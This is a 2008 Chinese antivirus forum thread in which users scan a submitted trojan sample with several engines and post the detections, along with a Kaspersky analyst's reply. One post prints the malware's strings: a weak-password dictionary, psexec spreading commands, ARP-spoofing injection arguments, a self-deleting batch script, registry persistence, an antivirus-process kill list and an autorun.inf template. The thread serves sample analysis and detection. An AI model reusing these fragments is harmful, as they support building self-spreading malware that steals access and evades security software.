1

tonger2003

xxwpk007

MicroVita AntiSpyware  
_____________________________________________
                                          
             风暴微塔反间谍
[强力查杀各种Win32位的病毒,木马,蠕虫,恶意软件]                  
                   http://221.10.254.214/
----------------------------------------------
开始扫描……


[F:\00.exe]
                    …………发现Spy！报告:[5] 下载者
文件信息:  大小:28672  MD5:2d5317d4cadf720d61e1991e7b3a3897


OK  扫描完毕！

wangjay1980

扔给KL

居然能看见明文
home    love    xp  user    game    123 movie   time    yeah    money   xpuser  java    fuck    asdfasdf    qwerqwer    12341234    zxcvzxcv    1qaz2wsx    rose    god sun mylove  147258369   123456789   0987654321  987654321   666666  88888888    ******  ********    hunry   NULL    goodbye goodgirl    mybaby  sa  groups  miszhang    miswang misli   miszhao miszhou zhangsir    wangsir lisir   zhaosir zhousir NULL    administrator   admin   password    123456  qwerty  abc123  memory  home    love    xp  88888   888888  8888888 88888888    5201314 1314520 asdfgh  alex    angel   123 1234    12345   123456  1234567 12345678    0123    01234   012345  0123456 01234567    012345678   123456789   asdf    baby    woaini  movie   java    fuck    asdfasdf    qwerqwer    12341234    qwer    asdf    zxcv    123qweasd   qweasd  asdzxc  qwerasdf    1234qwer    asdfzxcv    zxcvbnm qwertyuiop  asdfghjkl   qazwsx  zxcvzxcv    1qaz2wsx    rose    god sun mylove  147258369   0987654321  987654321   666666  ******  ********    hunry   goodbye goodgirl    mybaby  sa  groups  overit  360tray.exe RavTask.exe RavStub.exe RavMonD.exe RavMon.exe  CCenter.exe rfwstub.exe rfwProxy.exe    rfwsrv.exe  rfwmain.exe Ras.exe runiep.exe  NULL    "%s"    "%s"    %s  %s\psexec.exe \\%s -u %s -p %s -c %s\servrr.exe -d  http://tools.hxstat.com/ip/
  input name="ip" .   %s%d.%d %s\YxYhackArp.exe -idx 0 -ip %s -port 80 -insert "%s"   %s\YxYhackArp.exe   %s\nogui.exe    %s\wpcap.dll    %s\packet.dll   %s\wanpacket.dll    %s/arp.exe  %s/nogui.exe    %s/wpcap.dll    %s/packet.dll   %s/wanpacket.dll    %s2-%s254   %s\BindF.exe    ..  .html   .htm    .php    .asp    .jsp    .aspx   c:\ d:\ e:\ f:\ h:\ i:\ j:\ k:\ %s%d    iphlpapi.dll    GetTcpTable GetUdpTable SetTcpEntry 0.0.0.0 127.0.0.1   %s  %s  %s\psexec.exe   %s\servrr.exe   |   %s\rs.bat   @echo off
:start
if not exist ""%1"" goto done
del /F ""%1""
del ""%1""
goto start
:done
del /F %temp%
s.bat
del %temp%
.bat
  %%comspec%% /c %s %s    \drivers\svchost.exe    0124    Winnet COM+ Winnet COM+ Winnet COM+ c:\ \drivers\svchost.exe    Winnet COM+ Winnet COM+ Winnet COM+ WebDown Winnet COM+ Software\Microsoft\Windows\CurrentVersion\Run   %s\microsoft.exe    %s\SP00LV.exe   Internat    Program Files   Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL   CheckedValue    %s\%d.exe   安全卫士    扫描    专杀    注册表  Process 进程    毒  木马    防御    防火墙  病毒    检测    Firewall    virus   anti    金山    江民    卡巴斯基    worm    杀毒    360 专杀    微点    micropoint  克星    广告    Kaspersky   AVK F-Secure    eScan   Norton  诺顿    McAfee  Virus   Panda   熊猫    Trojan  Door    AVG |   w+  [AutoRun]
  open=%s
    shell\open=打开(&O)
    shell\open\Command=%s
  shell\open\Default=1
   shell\explore=资源管理器(&X)
   shell\explore\command=%s

[ 本帖最后由 wangjay1980 于 2008-2-5 11:25 编辑 ]

mofunzone

扔给avl

Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\My Documents\00.rar'
C:\Documents and Settings\Administrator\My Documents\
  00.rar
  00.rar:Zone.Identifier
    [0] Archive type: RAR
    --> 00.exe
        [DETECTION] Contains suspicious code HEUR/Malware
        [WARNING]   Infected files in archives cannot be repaired!
        [WARNING]   The file was ignored!


End of the scan: 2008年2月4日  19:18
Used time: 00:04 min

The scan has been done completely.

      0 Scanning directories
      3 Files were scanned
      0 viruses and/or unwanted programs were found
      1 Files were classified as suspicious:
      0 files were deleted
      0 files were repaired
      0 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
      3 Files not concerned
      1 Archives were scanned
      2 Warnings
      0 Notes

saga3721

[DETECTION] Contains suspicious code HEUR/Malware

天灰

00.rar\00.exe;C:\Documents and Settings\77\My Documents\00.rar;可能 DLOADER.Trojan;;
00.rar;C:\Documents and Settings\77\My Documents;发现档案文件中有受感染的对象;;

leonfg

ESET
C:\Documents and Settings\GUNDAM\桌面\00.rar » RAR » 00.exe - probably a variant of Win32/Genetik trojan

清蒸波波面

费尔，AVAST全部MISS

wangjay1980

Hello,

00.exek - Worm.Win32.AutoRun.cjn

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Please quote all when answering.

--
Best regards, Vladimir Krylov
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
http://www.kaspersky.com/

http://www.kaspersky.com/virusscanner - free online virus scanner.
http://www.kaspersky.com/helpdesk.html - technical support.



> Attachment: 00.rar

taiw_1144

发现未知木马，是否删除？
程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\TEMP\RAR$EX00.234\00.EXE
木马程序生成以下文件:
1) C:\WINDOWS\SYSTEM32\DRIVERS\SVCHOST.EXE
2) C:\WINDOWS\SYSTEM32\MICROSOFT.EXE
3) C:\WINDOWS\SYSTEM32\SP00LV.EXE
是否删除木马程序及其衍生物?